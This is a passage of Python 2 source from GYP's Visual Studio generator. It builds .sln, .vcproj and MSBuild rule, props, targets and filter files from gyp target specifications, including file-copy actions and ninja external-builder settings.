'ForcedIncludeFiles': '$(NOINHERIT)'})
p.AddFileConfig(_FixPath(source),
_ConfigFullName(config_name, config),
{}, tools=[tool])
# Do nothing if there was no precompiled source.
if extensions_excluded_from_precompile:
DisableForSourceTree(sources)
def _AddActions(actions_to_add, spec, relative_path_of_gyp_file):
# Add actions.
actions = spec.get('actions', [])
# Don't setup_env every time. When all the actions are run together in one
# batch file in VS, the PATH will grow too long.
# Membership in this set means that the cygwin environment has been set up,
# and does not need to be set up again.
have_setup_env = set()
for a in actions:
# Attach actions to the gyp file if nothing else is there.
inputs = a.get('inputs') or [relative_path_of_gyp_file]
attached_to = inputs[0]
need_setup_env = attached_to not in have_setup_env
cmd = _BuildCommandLineForRule(spec, a, has_input_path=False,
do_setup_env=need_setup_env)
have_setup_env.add(attached_to)
# Add the action.
_AddActionStep(actions_to_add,
inputs=inputs,
outputs=a.get('outputs', []),
description=a.get('message', a['action_name']),
command=cmd)
def _WriteMSVSUserFile(project_path, version, spec):
# Add run_as and test targets.
if 'run_as' in spec:
run_as = spec['run_as']
action = run_as.get('action', [])
environment = run_as.get('environment', [])
working_directory = run_as.get('working_directory', '.')
elif int(spec.get('test', 0)):
action = ['$(TargetPath)', '--gtest_print_time']
environment = []
working_directory = '.'
else:
return # Nothing to add
# Write out the user file.
user_file = _CreateMSVSUserFile(project_path, version, spec)
for config_name, c_data in spec['configurations'].iteritems():
user_file.AddDebugSettings(_ConfigFullName(config_name, c_data),
action, environment, working_directory)
user_file.WriteIfChanged()
def _AddCopies(actions_to_add, spec):
copies = _GetCopies(spec)
for inputs, outputs, cmd, description in copies:
_AddActionStep(actions_to_add, inputs=inputs, outputs=outputs,
description=description, command=cmd)
def _GetCopies(spec):
copies = []
# Add copies.
for cpy in spec.get('copies', []):
for src in cpy.get('files', []):
dst = os.path.join(cpy['destination'], os.path.basename(src))
# _AddCustomBuildToolForMSVS() will call _FixPath() on the inputs and
# outputs, so do the same for our generated command line.
if src.endswith('/'):
src_bare = src[:-1]
base_dir = posixpath.split(src_bare)[0]
outer_dir = posixpath.split(src_bare)[1]
cmd = 'cd "%s" && xcopy /e /f /y "%s" "%s\\%s\\"' % (
_FixPath(base_dir), outer_dir, _FixPath(dst), outer_dir)
copies.append(([src], ['dummy_copies', dst], cmd,
'Copying %s to %s' % (src, dst)))
else:
cmd = 'mkdir "%s" 2>nul & set ERRORLEVEL=0 & copy /Y "%s" "%s"' % (
_FixPath(cpy['destination']), _FixPath(src), _FixPath(dst))
copies.append(([src], [dst], cmd, 'Copying %s to %s' % (src, dst)))
return copies
def _GetPathDict(root, path):
# |path| will eventually be empty (in the recursive calls) if it was initially
# relative; otherwise it will eventually end up as '\', 'D:\', etc.
if not path or path.endswith(os.sep):
return root
parent, folder = os.path.split(path)
parent_dict = _GetPathDict(root, parent)
if folder not in parent_dict:
parent_dict[folder] = dict()
return parent_dict[folder]
def _DictsToFolders(base_path, bucket, flat):
# Convert to folders recursively.
children = []
for folder, contents in bucket.iteritems():
if type(contents) == dict:
folder_children = _DictsToFolders(os.path.join(base_path, folder),
contents, flat)
if flat:
children += folder_children
else:
folder_children = MSVSNew.MSVSFolder(os.path.join(base_path, folder),
name='(' + folder + ')',
entries=folder_children)
children.append(folder_children)
else:
children.append(contents)
return children
def _CollapseSingles(parent, node):
# Recursively explorer the tree of dicts looking for projects which are
# the sole item in a folder which has the same name as the project. Bring
# such projects up one level.
if (type(node) == dict and
len(node) == 1 and
node.keys()[0] == parent + '.vcproj'):
return node[node.keys()[0]]
if type(node) != dict:
return node
for child in node:
node[child] = _CollapseSingles(child, node[child])
return node
def _GatherSolutionFolders(sln_projects, project_objects, flat):
root = {}
# Convert into a tree of dicts on path.
for p in sln_projects:
gyp_file, target = gyp.common.ParseQualifiedTarget(p)[0:2]
gyp_dir = os.path.dirname(gyp_file)
path_dict = _GetPathDict(root, gyp_dir)
path_dict[target + '.vcproj'] = project_objects[p]
# Walk down from the top until we hit a folder that has more than one entry.
# In practice, this strips the top-level "src/" dir from the hierarchy in
# the solution.
while len(root) == 1 and type(root[root.keys()[0]]) == dict:
root = root[root.keys()[0]]
# Collapse singles.
root = _CollapseSingles('', root)
# Merge buckets until everything is a root entry.
return _DictsToFolders('', root, flat)
def _GetPathOfProject(qualified_target, spec, options, msvs_version):
default_config = _GetDefaultConfiguration(spec)
proj_filename = default_config.get('msvs_existing_vcproj')
if not proj_filename:
proj_filename = (spec['target_name'] + options.suffix +
msvs_version.ProjectExtension())
build_file = gyp.common.BuildFile(qualified_target)
proj_path = os.path.join(os.path.dirname(build_file), proj_filename)
fix_prefix = None
if options.generator_output:
project_dir_path = os.path.dirname(os.path.abspath(proj_path))
proj_path = os.path.join(options.generator_output, proj_path)
fix_prefix = gyp.common.RelativePath(project_dir_path,
os.path.dirname(proj_path))
return proj_path, fix_prefix
def _GetPlatformOverridesOfProject(spec):
# Prepare a dict indicating which project configurations are used for which
# solution configurations for this target.
config_platform_overrides = {}
for config_name, c in spec['configurations'].iteritems():
config_fullname = _ConfigFullName(config_name, c)
platform = c.get('msvs_target_platform', _ConfigPlatform(c))
fixed_config_fullname = '%s|%s' % (
_ConfigBaseName(config_name, _ConfigPlatform(c)), platform)
config_platform_overrides[config_fullname] = fixed_config_fullname
return config_platform_overrides
def _CreateProjectObjects(target_list, target_dicts, options, msvs_version):
"""Create a MSVSProject object for the targets found in target list.
Arguments:
target_list: the list of targets to generate project objects for.
target_dicts: the dictionary of specifications.
options: global generator options.
msvs_version: the MSVSVersion object.
Returns:
A set of created projects, keyed by target.
"""
global fixpath_prefix
# Generate each project.
projects = {}
for qualified_target in target_list:
spec = target_dicts[qualified_target]
if spec['toolset'] != 'target':
raise GypError(
'Multiple toolsets not supported in msvs build (target %s)' %
qualified_target)
proj_path, fixpath_prefix = _GetPathOfProject(qualified_target, spec,
options, msvs_version)
guid = _GetGuidOfProject(proj_path, spec)
overrides = _GetPlatformOverridesOfProject(spec)
build_file = gyp.common.BuildFile(qualified_target)
# Create object for this project.
obj = MSVSNew.MSVSProject(
proj_path,
name=spec['target_name'],
guid=guid,
spec=spec,
build_file=build_file,
config_platform_overrides=overrides,
fixpath_prefix=fixpath_prefix)
# Set project toolset if any (MS build only)
if msvs_version.UsesVcxproj():
obj.set_msbuild_toolset(
_GetMsbuildToolsetOfProject(proj_path, spec, msvs_version))
projects[qualified_target] = obj
# Set all the dependencies, but not if we are using an external builder like
# ninja
for project in projects.values():
if not project.spec.get('msvs_external_builder'):
deps = project.spec.get('dependencies', [])
deps = [projects[d] for d in deps]
project.set_dependencies(deps)
return projects
def _InitNinjaFlavor(options, target_list, target_dicts):
"""Initialize targets for the ninja flavor.
This sets up the necessary variables in the targets to generate msvs projects
that use ninja as an external builder. The variables in the spec are only set
if they have not been set. This allows individual specs to override the
default values initialized here.
Arguments:
options: Options provided to the generator.
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
"""
for qualified_target in target_list:
spec = target_dicts[qualified_target]
if spec.get('msvs_external_builder'):
# The spec explicitly defined an external builder, so don't change it.
continue
path_to_ninja = spec.get('msvs_path_to_ninja', 'ninja.exe')
spec['msvs_external_builder'] = 'ninja'
if not spec.get('msvs_external_builder_out_dir'):
spec['msvs_external_builder_out_dir'] = \
options.depth + '/out/$(Configuration)'
if not spec.get('msvs_external_builder_build_cmd'):
spec['msvs_external_builder_build_cmd'] = [
path_to_ninja,
'-C',
'$(OutDir)',
'$(ProjectName)',
]
if not spec.get('msvs_external_builder_clean_cmd'):
spec['msvs_external_builder_clean_cmd'] = [
path_to_ninja,
'-C',
'$(OutDir)',
'-t',
'clean',
'$(ProjectName)',
]
def CalculateVariables(default_variables, params):
"""Generated variables that require params to be known."""
generator_flags = params.get('generator_flags', {})
# Select project file format version (if unset, default to auto detecting).
msvs_version = MSVSVersion.SelectVisualStudioVersion(
generator_flags.get('msvs_version', 'auto'))
# Stash msvs_version for later (so we don't have to probe the system twice).
params['msvs_version'] = msvs_version
# Set a variable so conditions can be based on msvs_version.
default_variables['MSVS_VERSION'] = msvs_version.ShortName()
# To determine processor word size on Windows, in addition to checking
# PROCESSOR_ARCHITECTURE (which reflects the word size of the current
# process), it is also necessary to check PROCESSOR_ARCITEW6432 (which
# contains the actual word size of the system when running thru WOW64).
if (os.environ.get('PROCESSOR_ARCHITECTURE', '').find('64') >= 0 or
os.environ.get('PROCESSOR_ARCHITEW6432', '').find('64') >= 0):
default_variables['MSVS_OS_BITS'] = 64
else:
default_variables['MSVS_OS_BITS'] = 32
if gyp.common.GetFlavor(params) == 'ninja':
default_variables['SHARED_INTERMEDIATE_DIR'] = '$(OutDir)gen'
def PerformBuild(data, configurations, params):
options = params['options']
msvs_version = params['msvs_version']
devenv = os.path.join(msvs_version.path, 'Common7', 'IDE', 'devenv.com')
for build_file, build_file_dict in data.iteritems():
(build_file_root, build_file_ext) = os.path.splitext(build_file)
if build_file_ext != '.gyp':
continue
sln_path = build_file_root + options.suffix + '.sln'
if options.generator_output:
sln_path = os.path.join(options.generator_output, sln_path)
for config in configurations:
arguments = [devenv, sln_path, '/Build', config]
print 'Building [%s]: %s' % (config, arguments)
rtn = subprocess.check_call(arguments)
def GenerateOutput(target_list, target_dicts, data, params):
"""Generate .sln and .vcproj files.
This is the entry point for this generator.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
data: Dictionary containing per .gyp data.
"""
global fixpath_prefix
options = params['options']
# Get the project file format version back out of where we stashed it in
# GeneratorCalculatedVariables.
msvs_version = params['msvs_version']
generator_flags = params.get('generator_flags', {})
# Optionally shard targets marked with 'msvs_shard': SHARD_COUNT.
(target_list, target_dicts) = MSVSUtil.ShardTargets(target_list, target_dicts)
# Optionally use the large PDB workaround for targets marked with
# 'msvs_large_pdb': 1.
(target_list, target_dicts) = MSVSUtil.InsertLargePdbShims(
target_list, target_dicts, generator_default_variables)
# Optionally configure each spec to use ninja as the external builder.
if params.get('flavor') == 'ninja':
_InitNinjaFlavor(options, target_list, target_dicts)
# Prepare the set of configurations.
configs = set()
for qualified_target in target_list:
spec = target_dicts[qualified_target]
for config_name, config in spec['configurations'].iteritems():
configs.add(_ConfigFullName(config_name, config))
configs = list(configs)
# Figure out all the projects that will be generated and their guids
project_objects = _CreateProjectObjects(target_list, target_dicts, options,
msvs_version)
# Generate each project.
missing_sources = []
for project in project_objects.values():
fixpath_prefix = project.fixpath_prefix
missing_sources.extend(_GenerateProject(project, options, msvs_version,
generator_flags))
fixpath_prefix = None
for build_file in data:
# Validate build_file extension
if not build_file.endswith('.gyp'):
continue
sln_path = os.path.splitext(build_file)[0] + options.suffix + '.sln'
if options.generator_output:
sln_path = os.path.join(options.generator_output, sln_path)
# Get projects in the solution, and their dependents.
sln_projects = gyp.common.BuildFileTargets(target_list, build_file)
sln_projects += gyp.common.DeepDependencyTargets(target_dicts, sln_projects)
# Create folder hierarchy.
root_entries = _GatherSolutionFolders(
sln_projects, project_objects, flat=msvs_version.FlatSolution())
# Create solution.
sln = MSVSNew.MSVSSolution(sln_path,
entries=root_entries,
variants=configs,
websiteProperties=False,
version=msvs_version)
sln.Write()
if missing_sources:
error_message = "Missing input files:\n" + \
'\n'.join(set(missing_sources))
if generator_flags.get('msvs_error_on_missing_sources', False):
raise GypError(error_message)
else:
print >> sys.stdout, "Warning: " + error_message
def _GenerateMSBuildFiltersFile(filters_path, source_files,
extension_to_rule_name):
"""Generate the filters file.
This file is used by Visual Studio to organize the presentation of source
files into folders.
Arguments:
filters_path: The path of the file to be created.
source_files: The hierarchical structure of all the sources.
extension_to_rule_name: A dictionary mapping file extensions to rules.
"""
filter_group = []
source_group = []
_AppendFiltersForMSBuild('', source_files, extension_to_rule_name,
filter_group, source_group)
if filter_group:
content = ['Project',
{'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
},
['ItemGroup'] + filter_group,
['ItemGroup'] + source_group
]
easy_xml.WriteXmlIfChanged(content, filters_path, pretty=True, win32=True)
elif os.path.exists(filters_path):
# We don't need this filter anymore. Delete the old filter file.
os.unlink(filters_path)
def _AppendFiltersForMSBuild(parent_filter_name, sources,
extension_to_rule_name,
filter_group, source_group):
"""Creates the list of filters and sources to be added in the filter file.
Args:
parent_filter_name: The name of the filter under which the sources are
found.
sources: The hierarchy of filters and sources to process.
extension_to_rule_name: A dictionary mapping file extensions to rules.
filter_group: The list to which filter entries will be appended.
source_group: The list to which source entries will be appeneded.
"""
for source in sources:
if isinstance(source, MSVSProject.Filter):
# We have a sub-filter. Create the name of that sub-filter.
if not parent_filter_name:
filter_name = source.name
else:
filter_name = '%s\\%s' % (parent_filter_name, source.name)
# Add the filter to the group.
filter_group.append(
['Filter', {'Include': filter_name},
['UniqueIdentifier', MSVSNew.MakeGuid(source.name)]])
# Recurse and add its dependents.
_AppendFiltersForMSBuild(filter_name, source.contents,
extension_to_rule_name,
filter_group, source_group)
else:
# It's a source. Create a source entry.
_, element = _MapFileToMsBuildSourceType(source, extension_to_rule_name)
source_entry = [element, {'Include': source}]
# Specify the filter it is part of, if any.
if parent_filter_name:
source_entry.append(['Filter', parent_filter_name])
source_group.append(source_entry)
def _MapFileToMsBuildSourceType(source, extension_to_rule_name):
"""Returns the group and element type of the source file.
Arguments:
source: The source file name.
extension_to_rule_name: A dictionary mapping file extensions to rules.
Returns:
A pair of (group this file should be part of, the label of element)
"""
_, ext = os.path.splitext(source)
if ext in extension_to_rule_name:
group = 'rule'
element = extension_to_rule_name[ext]
elif ext in ['.cc', '.cpp', '.c', '.cxx']:
group = 'compile'
element = 'ClCompile'
elif ext in ['.h', '.hxx']:
group = 'include'
element = 'ClInclude'
elif ext == '.rc':
group = 'resource'
element = 'ResourceCompile'
elif ext == '.idl':
group = 'midl'
element = 'Midl'
else:
group = 'none'
element = 'None'
return (group, element)
def _GenerateRulesForMSBuild(output_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name):
# MSBuild rules are implemented using three files: an XML file, a .targets
# file and a .props file.
# See http://blogs.msdn.com/b/vcblog/archive/2010/04/21/quick-help-on-vs2010-custom-build-rule.aspx
# for more details.
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
msbuild_rules = []
for rule in rules_native:
# Skip a rule with no action and no inputs.
if 'action' not in rule and not rule.get('rule_sources', []):
continue
msbuild_rule = MSBuildRule(rule, spec)
msbuild_rules.append(msbuild_rule)
extension_to_rule_name[msbuild_rule.extension] = msbuild_rule.rule_name
if msbuild_rules:
base = spec['target_name'] + options.suffix
props_name = base + '.props'
targets_name = base + '.targets'
xml_name = base + '.xml'
props_files_of_rules.add(props_name)
targets_files_of_rules.add(targets_name)
props_path = os.path.join(output_dir, props_name)
targets_path = os.path.join(output_dir, targets_name)
xml_path = os.path.join(output_dir, xml_name)
_GenerateMSBuildRulePropsFile(props_path, msbuild_rules)
_GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules)
_GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules)
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(spec, rules, sources, excluded_sources)
class MSBuildRule(object):
"""Used to store information used to generate an MSBuild rule.
Attributes:
rule_name: The rule name, sanitized to use in XML.
target_name: The name of the target.
after_targets: The name of the AfterTargets element.
before_targets: The name of the BeforeTargets element.
depends_on: The name of the DependsOn element.
compute_output: The name of the ComputeOutput element.
dirs_to_make: The name of the DirsToMake element.
inputs: The name of the _inputs element.
tlog: The name of the _tlog element.
extension: The extension this rule applies to.
description: The message displayed when this rule is invoked.
additional_dependencies: A string listing additional dependencies.
outputs: The outputs of this rule.
command: The command used to run the rule.
"""
def __init__(self, rule, spec):
self.display_name = rule['rule_name']
# Assure that the rule name is only characters and numbers
self.rule_name = re.sub(r'\W', '_', self.display_name)
# Create the various element names, following the example set by the
# Visual Studio 2008 to 2010 conversion. I don't know if VS2010
# is sensitive to the exact names.
self.target_name = '_' + self.rule_name
self.after_targets = self.rule_name + 'AfterTargets'
self.before_targets = self.rule_name + 'BeforeTargets'
self.depends_on = self.rule_name + 'DependsOn'
self.compute_output = 'Compute%sOutput' % self.rule_name
self.dirs_to_make = self.rule_name + 'DirsToMake'
self.inputs = self.rule_name + '_inputs'
self.tlog = self.rule_name + '_tlog'
self.extension = rule['extension']
if not self.extension.startswith('.'):
self.extension = '.' + self.extension
self.description = MSVSSettings.ConvertVCMacrosToMSBuild(
rule.get('message', self.rule_name))
old_additional_dependencies = _FixPaths(rule.get('inputs', []))
self.additional_dependencies = (
';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_additional_dependencies]))
old_outputs = _FixPaths(rule.get('outputs', []))
self.outputs = ';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_outputs])
old_command = _BuildCommandLineForRule(spec, rule, has_input_path=True,
do_setup_env=True)
self.command = MSVSSettings.ConvertVCMacrosToMSBuild(old_command)
def _GenerateMSBuildRulePropsFile(props_path, msbuild_rules):
"""Generate the .props file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'}]
for rule in msbuild_rules:
content.extend([
['PropertyGroup',
{'Condition': "'$(%s)' == '' and '$(%s)' == '' and "
"'$(ConfigurationType)' != 'Makefile'" % (rule.before_targets,
rule.after_targets)
},
[rule.before_targets, 'Midl'],
[rule.after_targets, 'CustomBuild'],
],
['PropertyGroup',
[rule.depends_on,
{'Condition': "'$(ConfigurationType)' != 'Makefile'"},
'_SelectedFiles;$(%s)' % rule.depends_on
],
],
['ItemDefinitionGroup',
[rule.rule_name,
['CommandLineTemplate', rule.command],
['Outputs', rule.outputs],
['ExecutionDescription', rule.description],
['AdditionalDependencies', rule.additional_dependencies],
],
]
])
easy_xml.WriteXmlIfChanged(content, props_path, pretty=True, win32=True)
def _GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules):
"""Generate the .targets file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
}
]
item_group = [
'ItemGroup',
['PropertyPageSchema',
{'Include': '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'}
]
]
for rule in msbuild_rules:
item_group.append(
['AvailableItemName',
{'Include': rule.rule_name},
['Targets', rule.target_name],
])
content.append(item_group)
for rule in msbuild_rules:
content.append(
['UsingTask',
{'TaskName': rule.rule_name,
'TaskFactory': 'XamlTaskFactory',
'AssemblyName': 'Microsoft.Build.Tasks.v4.0'
},
['Task', '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'],
])
for rule in msbuild_rules:
rule_name = rule.rule_name
target_outputs = '%%(%s.Outputs)' % rule_name
target_inputs = ('%%(%s.Identity);%%(%s.AdditionalDependencies);'
'$(MSBuildProjectFile)') % (rule_name, rule_name)
rule_inputs = '%%(%s.Identity)' % rule_name
extension_condition = ("'%(Extension)'=='.obj' or "
"'%(Extension)'=='.res' or "
"'%(Extension)'=='.rsc' or "
"'%(Extension)'=='.lib'")
remove_section = [
'ItemGroup',
{'Condition': "'@(SelectedFiles)' != ''"},
[rule_name,
{'Remove': '@(%s)' % rule_name,
'Condition': "'%(Identity)' != '@(SelectedFiles)'"
}
]
]
inputs_section = [
'ItemGroup',
[rule.inputs, {'Include': '%%(%s.AdditionalDependencies)' % rule_name}]
]
logging_section = [
'ItemGroup',
[rule.tlog,
{'Include': '%%(%s.Outputs)' % rule_name,
'Condition': ("'%%(%s.Outputs)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" %
(rule_name, rule_name))
},
['Source', "@(%s, '|')" % rule_name],
['Inputs', "@(%s -> '%%(Fullpath)', ';')" % rule.inputs],
],
]
message_section = [
'Message',
{'Importance': 'High',
'Text': '%%(%s.ExecutionDescription)' % rule_name
}
]
write_tlog_section = [
'WriteLinesToFile',
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule.tlog, rule.tlog),
'File': '$(IntDir)$(ProjectName).write.1.tlog',
'Lines': "^%%(%s.Source);@(%s->'%%(Fullpath)')" % (rule.tlog,
rule.tlog)
}
]
read_tlog_section = [
'WriteLinesToFile',
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule.tlog, rule.tlog),
'File': '$(IntDir)$(ProjectName).read.1.tlog',
'Lines': "^%%(%s.Source);%%(%s.Inputs)" % (rule.tlog, rule.tlog)
}
]
command_and_input_section = [
rule_name,
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule_name, rule_name),
'CommandLineTemplate': '%%(%s.CommandLineTemplate)' % rule_name,
'AdditionalOptions': '%%(%s.AdditionalOptions)' % rule_name,
'Inputs': rule_inputs
}
]
content.extend([
['Target',
{'Name': rule.target_name,
'BeforeTargets': '$(%s)' % rule.before_targets,
'AfterTargets': '$(%s)' % rule.after_targets,
'Condition': "'@(%s)' != ''" % rule_name,
'DependsOnTargets': '$(%s);%s' % (rule.depends_on,
rule.compute_output),
'Outputs': target_outputs,
'Inputs': target_inputs
},
remove_section,
inputs_section,
logging_section,
message_section,
write_tlog_section,
read_tlog_section,
command_and_input_section,
],
['PropertyGroup',
['ComputeLinkInputsTargets',
'$(ComputeLinkInputsTargets);',
'%s;' % rule.compute_output
],
['ComputeLibInputsTargets',
'$(ComputeLibInputsTargets);',
'%s;' % rule.compute_output
],
],
['Target',
{'Name': rule.compute_output,
'Condition': "'@(%s)' != ''" % rule_name
},
['ItemGroup',
[rule.dirs_to_make,
{'Condition': "'@(%s)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" % (rule_name, rule_name),
'Include': '%%(%s.Outputs)' % rule_name
}
],
['Link',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['Lib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['ImpLib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
],
['MakeDir',
{'Directories': ("@(%s->'%%(RootDir)%%(Directory)')" %
rule.dirs_to_make)
}
]
],
])
easy_xml.WriteXmlIfChanged(content, targets_path, pretty=True, win32=True)
def _GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules):
# Generate the .xml file
content = [
'ProjectSchemaDefinitions',
{'xmlns': ('clr-namespace:Microsoft.Build.Framework.XamlTypes;'
'assembly=Microsoft.Build.Framework'),
'xmlns:x': 'http://schemas.microsoft.com/winfx/2006/xaml',
'xmlns:sys': 'clr-namespace:System;assembly=mscorlib',
'xmlns:transformCallback':
'Microsoft.Cpp.Dev10.ConvertPropertyCallback'
}
]
for rule in msbuild_rules:
content.extend([
['Rule',
{'Name': rule.rule_name,
'PageTemplate': 'tool',
'DisplayName': rule.display_name,
'Order': '200'
},
['Rule.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name
}
]
],
['Rule.Categories',
['Category',
{'Name': 'General'},
['Category.DisplayName',
['sys:String', 'General'],
],
],
['Category',
{'Name': 'Command Line',
'Subtype': 'CommandLine'
},
['Category.DisplayName',
['sys:String', 'Command Line'],
],
],
],
['StringListProperty',
{'Name': 'Inputs',
'Category': 'Command Line',
'IsRequired': 'true',
'Switch': ' '
},
['StringListProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name,
'SourceType': 'Item'
}
]
],
],
['StringProperty',
{'Name': 'CommandLineTemplate',
'DisplayName': 'Command Line',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['DynamicEnumProperty',
{'Name': rule.before_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute Before'],
],
['DynamicEnumProperty.Description',
['sys:String', 'Specifies the targets for the build customization'
' to run before.'
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.before_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'HasConfigurationCondition': 'true'
}
]
],
],
['DynamicEnumProperty',
{'Name': rule.after_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute After'],
],
['DynamicEnumProperty.Description',
['sys:String', ('Specifies the targets for the build customization'
' to run after.')
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.after_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': '',
'HasConfigurationCondition': 'true'
}
]
],
],
['StringListProperty',
{'Name': 'Outputs',
'DisplayName': 'Outputs',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringProperty',
{'Name': 'ExecutionDescription',
'DisplayName': 'Execution Description',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringListProperty',
{'Name': 'AdditionalDependencies',
'DisplayName': 'Additional Dependencies',
'IncludeInCommandLine': 'False',
'Visible': 'false'
}
],
['StringProperty',
{'Subtype': 'AdditionalOptions',
'Name': 'AdditionalOptions',
'Category': 'Command Line'
},
['StringProperty.DisplayName',
['sys:String', 'Additional Options'],
],
['StringProperty.Description',
['sys:String', 'Additional Options'],
],
],
],
['ItemType',
{'Name': rule.rule_name,
'DisplayName': rule.display_name
}
],
['FileExtension',
{'Name': '*' + rule.extension,
'ContentType': rule.rule_name
}
],
['ContentType',
{'Name': rule.rule_name,
'DisplayName': '',
'ItemType': rule.rule_name
}
]
])
easy_xml.WriteXmlIfChanged(content, xml_path, pretty=True, win32=True)
def _GetConfigurationAndPlatform(name, settings):
configuration = name.rsplit('_', 1)[0]
platform = settings.get('msvs_configuration_platform', 'Win32')
return (configuration, platform)
def _GetConfigurationCondition(name, settings):
return (r"'$(Configuration)|$(Platform)'=='%s|%s'" %
_GetConfigurationAndPlatform(name, settings))
def _GetMSBuildProjectConfigurations(configurations):
group = ['ItemGroup', {'Label': 'ProjectConfigurations'}]
for (name, settings) in sorted(configurations.iteritems()):
configuration, platform = _GetConfigurationAndPlatform(name, settings)
designation = '%s|%s' % (configuration, platform)
group.append(
['ProjectConfiguration', {'Include': designation},
['Configuration', configuration],
['Platform', platform]])
return [group]
def _GetMSBuildGlobalProperties(spec, guid, gyp_file_name):
namespace = os.path.splitext(gyp_file_name)[0]
return [
['PropertyGroup', {'Label': 'Globals'},
['ProjectGuid', guid],
['Keyword', 'Win32Proj'],
['RootNamespace', namespace],
]
]
def _GetMSBuildConfigurationDetails(spec, build_file):
properties = {}
for name, settings in spec['configurations'].iteritems():
msbuild_attributes = _GetMSBuildAttributes(spec, settings, build_file)
condition = _GetConfigurationCondition(name, settings)
character_set = msbuild_attributes.get('CharacterSet')
_AddConditionalProperty(properties, condition, 'ConfigurationType',
msbuild_attributes['ConfigurationType'])
if character_set:
_AddConditionalProperty(properties, condition, 'CharacterSet',
character_set)
return _GetMSBuildPropertyGroup(spec, 'Configuration', properties)
def _GetMSBuildLocalProperties(msbuild_toolset):
# Currently the only local property we support is PlatformToolset
properties = {}
if msbuild_toolset:
properties = [
['PropertyGroup', {'Label': 'Locals'},
['PlatformToolset', msbuild_toolset],
]
]
return properties
def _GetMSBuildPropertySheets(configurations):
user_props = r'$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props'
additional_props = {}
props_specified = False
for name, settings in sorted(configurations.iteritems()):
configuration = _GetConfigurationCondition(name, settings)
if settings.has_key('msbuild_props'):
additional_props[configuration] = _FixPaths(settings['msbuild_props'])
props_specified = True
else:
additional_props[configuration] = ''
if not props_specified:
return [
['ImportGroup',
{'Label': 'PropertySheets'},
['Import',
{'Project': user_props,
'Condition': "exists('%s')" % user_props,
'Label': 'LocalAppDataPlatform'
}
]
]
]
else:
sheets = []
for condition, props in additional_props.iteritems():
import_group = [
'ImportGroup',
{'Label': 'PropertySheets',
'Condition': condition
},
['Import',
{'Project': user_props,
'Condition': "exists('%s')" % user_props,
'Label': 'LocalAppDataPlatform'
}
]
]
for props_file in props:
import_group.append(['Import', {'Project':props_file}])
sheets.append(import_group)
return sheets
def _ConvertMSVSBuildAttributes(spec, config, build_file):
config_type = _GetMSVSConfigurationType(spec, build_file)
msvs_attributes = _GetMSVSAttributes(spec, config, config_type)
msbuild_attributes = {}
for a in msvs_attributes:
if a in ['IntermediateDirectory', 'OutputDirectory']:
directory = MSVSSettings.ConvertVCMacrosToMSBuild(msvs_attributes[a])
if not directory.endswith('\\'):
directory += '\\'
msbuild_attributes[a] = directory
elif a == 'CharacterSet':
msbuild_attributes[a] = _ConvertMSVSCharacterSet(msvs_attributes[a])
elif a == 'ConfigurationType':
msbuild_attributes[a] = _ConvertMSVSConfigurationType(msvs_attributes[a])
else:
print 'Warning: Do not know how to convert MSVS attribute ' + a
return msbuild_attributes
def _ConvertMSVSCharacterSet(char_set):
if char_set.isdigit():
char_set = {
'0': 'MultiByte',
'1': 'Unicode',
'2': 'MultiByte',
}[char_set]
return char_set
def _ConvertMSVSConfigurationType(config_type):
if config_type.isdigit():
config_type = {
'1': 'Application',
'2': 'DynamicLibrary',
'4': 'StaticLibrary',
'10': 'Utility'
}[config_type]
return config_type
def _GetMSBuildAttributes(spec, config, build_file):
if 'msbuild_configuration_attributes' not in config:
msbuild_attributes = _ConvertMSVSBuildAttributes(spec, config, build_file)
else:
